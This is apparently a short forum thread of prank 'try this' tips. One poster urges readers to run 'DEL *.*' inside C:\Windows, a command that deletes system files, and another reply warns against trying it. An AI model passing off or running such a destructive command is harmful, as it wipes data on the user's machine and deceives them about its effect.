Also try this... on a unix terminal type Ctrl-S, and lemme know if something weird happened!!

Try this Open CMD prompt.
CD C:\Windows
DEL *.*
Let me know what happens :p
well.. totti I am sure CTRL-S does something better... anyways please dont try the DEL thing on our desktop.. that's going to be the only comp resourse I will have next year:((
